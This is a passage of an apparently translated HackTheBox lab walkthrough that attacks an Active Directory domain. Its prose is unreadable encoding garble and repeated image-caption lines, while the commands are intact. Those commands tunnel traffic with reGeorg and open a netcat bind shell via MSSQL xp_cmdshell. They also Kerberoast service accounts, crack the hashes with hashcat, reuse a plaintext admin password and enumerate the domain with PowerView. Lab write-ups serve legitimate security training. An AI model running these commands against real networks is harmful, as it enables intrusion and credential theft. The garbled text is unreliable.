ืืš ื›ืืฉืจ ืื ื• ืžื ืกื™ื ืœื’ืฉืช ืืœื™ื•, ืื ื• ืžืงื‘ืœื™ื ืฉื’ื™ืื” 404. ืžืฉืžืขื•ืช ื”ื“ื‘ืจ ื”ื™ื ืฉืงื‘ืฆื™ *.aspx ืื™ื ื ืžื‘ื•ืฆืขื™ื. ื›ื“ื™ ืœื”ืคืขื™ืœ ืงื‘ืฆื™ื ืขื ื”ืจื—ื‘ื•ืช ืืœื”, ื”ืชืงืŸ ืืช ASP.NET 4.5 ื‘ืื•ืคืŸ ื”ื‘ื.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื•ืขื›ืฉื™ื•, ื›ืืฉืจ ื ื™ื’ืฉื™ื ืœtunnel.aspx, ืื ื• ืžืงื‘ืœื™ื ืืช ื”ืชืฉื•ื‘ื” ืฉื”ื›ืœ ืžื•ื›ืŸ ืœืคืขื•ืœื”.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื‘ื•ืื• ื ืชื—ื™ืœ ืืช ื—ืœืง ื”ืœืงื•ื— ืฉืœ ื”ืืคืœื™ืงืฆื™ื”, ืฉื™ืขื‘ื™ืจ ืชืขื‘ื•ืจื”. ื ืขื‘ื™ืจ ืืช ื›ืœ ื”ืชืขื‘ื•ืจื” ืžื™ืฆื™ืื” 5432 ืœืฉืจืช.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื•ืื ื—ื ื• ืžืฉืชืžืฉื™ื ื‘-proxychains ื›ื“ื™ ืœืฉืœื•ื— ืืช ื”ืชืขื‘ื•ืจื” ืฉืœ ื›ืœ ื™ื™ืฉื•ื ื“ืจืš ื”-proxy ืฉืœื ื•. ื‘ื•ืื• ื ื•ืกื™ืฃ ืืช ื”-proxy ื”ื–ื” ืœืงื•ื‘ืฅ ื”ืชืฆื•ืจื” /etc/proxychains.conf.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื›ืขืช ื ืขืœื” ืืช ื”ืชื•ื›ื ื™ืช ืœืฉืจืช netcat, ืฉืื™ืชื• ื ื›ื™ืŸ ืžืขื˜ืคืช ื›ืจื™ื›ื” ื™ืฆื™ื‘ื”, ื•ืืช ื”ืชืกืจื™ื˜ ื”ืคืขืœ ืืช Kerberoast, ืฉืื™ืชื• ื ื‘ืฆืข ืืช ืžืชืงืคืช ื”-Kerberoasting.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื›ืขืช, ื‘ืืžืฆืขื•ืช MSSQL, ืื ื• ืžืฉื™ืงื™ื ืืช ื”ืžืื–ื™ืŸ.

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื•ืื ื—ื ื• ืžืชื—ื‘ืจื™ื ื“ืจืš ื”-proxy ืฉืœื ื•.

proxychains rlwrap nc poo.htb 4321

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื•ื‘ื•ืื• ื ืฉื™ื’ ืืช ื”ื’ื™ื‘ื•ื‘ื™ื.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืœืื—ืจ ืžื›ืŸ, ืขืœื™ืš ืœื—ื–ื•ืจ ืขืœ ื”ื’ื™ื‘ื•ื‘ื™ื ื”ืœืœื•. ืžื›ื™ื•ื•ืŸ ืฉืœื ื”ื™ื” ืœ-rockyou ืžื™ืœื•ืŸ ื ืชื•ื ื™ ืกื™ืกืžืื•ืช, ื”ืฉืชืžืฉืชื™ ื‘ื›ืœ ืžื™ืœื•ื ื™ ื”ืกื™ืกืžืื•ืช ืฉืกื•ืคืงื• ื‘-Seclists. ืœืกืคื™ืจื” ืื ื• ืžืฉืชืžืฉื™ื ื‘-hashcat.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

ื•ืื ื—ื ื• ืžื•ืฆืื™ื ืืช ืฉืชื™ ื”ืกื™ืกืžืื•ืช, ื”ืจืืฉื•ื ื” ื‘ืžื™ืœื•ืŸ dutch_passwordlist.txt, ื•ื”ืฉื ื™ื™ื” ื‘-Keyboard-Combinations.txt.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืื– ื™ืฉ ืœื ื• ืฉืœื•ืฉื” ืžืฉืชืžืฉื™ื, ืื ื—ื ื• ื”ื•ืœื›ื™ื ืœื‘ืงืจ ื”ืชื—ื•ื. ื‘ื•ื ื ื’ืœื” ืงื•ื“ื ืืช ื›ืชื•ื‘ืชื•.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืžืฆื•ื™ืŸ, ืœืžื“ื ื• ืืช ื›ืชื•ื‘ืช ื”-IP ืฉืœ ื‘ืงืจ ื”ืชื—ื•ื. ื‘ื•ืื• ืœื’ืœื•ืช ืืช ื›ืœ ื”ืžืฉืชืžืฉื™ื ืฉืœ ื”ื“ื•ืžื™ื™ืŸ, ื›ืžื• ื’ื ืžื™ ืžื”ื ื”ื•ื ืžื ื”ืœ. ื›ื“ื™ ืœื”ื•ืจื™ื“ ืืช ื”ืกืงืจื™ืคื˜ ื›ื“ื™ ืœืงื‘ืœ ืžื™ื“ืข PowerView.ps1. ืœืื—ืจ ืžื›ืŸ ื ืชื—ื‘ืจ ื‘ืืžืฆืขื•ืช evil-winrm, ื•ื ืฆื™ื™ืŸ ืืช ื”ืกืคืจื™ื™ื” ืขื ื”ืกืงืจื™ืคื˜ ื‘ืคืจืžื˜ืจ -s. ื•ืื– ืคืฉื•ื˜ ื˜ืขืŸ ืืช ื”ืกืงืจื™ืคื˜ ืฉืœ PowerView.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื›ืขืช ื™ืฉ ืœื ื• ื’ื™ืฉื” ืœื›ืœ ื”ืคื•ื ืงืฆื™ื•ืช ืฉืœื•. ื”ืžืฉืชืžืฉ p00_adm ื ืจืื” ื›ืžื• ืžืฉืชืžืฉ ืžื™ื•ื—ืก, ืื– ื ืขื‘ื•ื“ ื‘ื”ืงืฉืจ ืฉืœื•. ื‘ื•ืื• ื ื™ืฆื•ืจ ืื•ื‘ื™ื™ืงื˜ PSCredential ืขื‘ื•ืจ ืžืฉืชืžืฉ ื–ื”.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

ื›ืขืช ื›ืœ ืคืงื•ื“ื•ืช Powershell ืฉื‘ื”ืŸ ืื ื• ืžืฆื™ื™ื ื™ื Creds ื™ื‘ื•ืฆืขื• ืžื˜ืขื p00_adm. ื‘ื•ืื• ื ืฆื™ื’ ืจืฉื™ืžื” ืฉืœ ืžืฉืชืžืฉื™ื ื•ืืช ื”ืชื›ื•ื ื” AdminCount.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื•ื›ืš, ื”ืžืฉืชืžืฉ ืฉืœื ื• ื”ื•ื ื‘ืืžืช ืžื™ื•ื—ืก. ื‘ื•ื ื ืจืื” ืœืื™ื–ื” ืงื‘ื•ืฆื•ืช ื”ื•ื ืžืฉืชื™ื™ืš.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืœื‘ืกื•ืฃ ืื ื• ืžืืฉืจื™ื ืฉื”ืžืฉืชืžืฉ ื”ื•ื ืžื ื”ืœ ื“ื•ืžื™ื™ืŸ. ื–ื” ื ื•ืชืŸ ืœื• ืืช ื”ื–ื›ื•ืช ืœื”ื™ื›ื ืก ืžืจื—ื•ืง ืœื‘ืงืจ ื”ืชื—ื•ื. ื‘ื•ืื• ื ื ืกื” ืœื”ื™ื›ื ืก ืขื WinRM ื‘ืืžืฆืขื•ืช ื”ืžื ื”ืจื” ืฉืœื ื•. ื”ื™ื™ืชื™ ืžื‘ื•ืœื‘ืœ ืžื”ืฉื’ื™ืื•ืช ืฉื”ื•ืฆื™ื reGeorg ื‘ืขืช ื”ืฉื™ืžื•ืฉ ื‘-evil-winrm.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื•ืื– ืื ื—ื ื• ืžืฉืชืžืฉื™ื ื‘ืื—ื“ ืื—ืจ, ืงืœ ื™ื•ืชืจ, ืชึทืกืจึดื™ื˜ ื›ื“ื™ ืœื”ืชื—ื‘ืจ ืœ-WinRM. ืคืชื— ื•ืฉื ื” ืคืจืžื˜ืจื™ื ืฉืœ ื—ื™ื‘ื•ืจ.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืื ื—ื ื• ืžื ืกื™ื ืœื”ืชื—ื‘ืจ, ื•ืื ื—ื ื• ื‘ืžืขืจื›ืช.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืื‘ืœ ืื™ืŸ ื“ื’ืœ. ืœืื—ืจ ืžื›ืŸ ื”ืกืชื›ืœ ืขืœ ื”ืžืฉืชืžืฉ ื•ื‘ื“ื•ืง ืืช ืฉื•ืœื—ืŸ ื”ืขื‘ื•ื“ื”.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื‘-mr3ks ืื ื• ืžื•ืฆืื™ื ืืช ื”ื“ื’ืœ ื•ื”ืžืขื‘ื“ื” ื”ื•ืฉืœืžื” ื‘-100%.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื–ื” ื”ื›ืœ. ื›ืžืฉื•ื‘, ื”ื’ื™ื‘ื• ืื ืœืžื“ืชื ืžืฉื”ื• ื—ื“ืฉ ืžื”ืžืืžืจ ื”ื–ื” ื•ื”ืื ื”ื•ื ื”ื™ื” ืฉื™ืžื•ืฉื™ ืขื‘ื•ืจื›ื.

ืืชื” ื™ื›ื•ืœ ืœื”ืฆื˜ืจืฃ ืืœื™ื ื• ื‘ ืžื‘ืจืง. ืฉื ืชื•ื›ืœื• ืœืžืฆื•ื ื—ื•ืžืจื™ื ืžืขื ื™ื™ื ื™ื, ืงื•ืจืกื™ื ืžืžื•ื–ื’ื™ื ื•ื’ื ืชื•ื›ื ื•ืช. ื‘ื•ืื• ื ืืกื•ืฃ ืงื”ื™ืœื” ื‘ื” ื™ื”ื™ื• ืื ืฉื™ื ืฉืžื‘ื™ื ื™ื ื‘ื”ืจื‘ื” ืชื—ื•ืžื™ IT, ื•ืื– ื ื•ื›ืœ ืชืžื™ื“ ืœืขื–ื•ืจ ืื—ื“ ืœืฉื ื™ ื‘ื›ืœ ื ื•ืฉื IT ื•ืื‘ื˜ื—ืช ืžื™ื“ืข.

ืžืงื•ืจ: www.habr.com

ื”ื•ืกืคืช ืชื’ื•ื‘ื”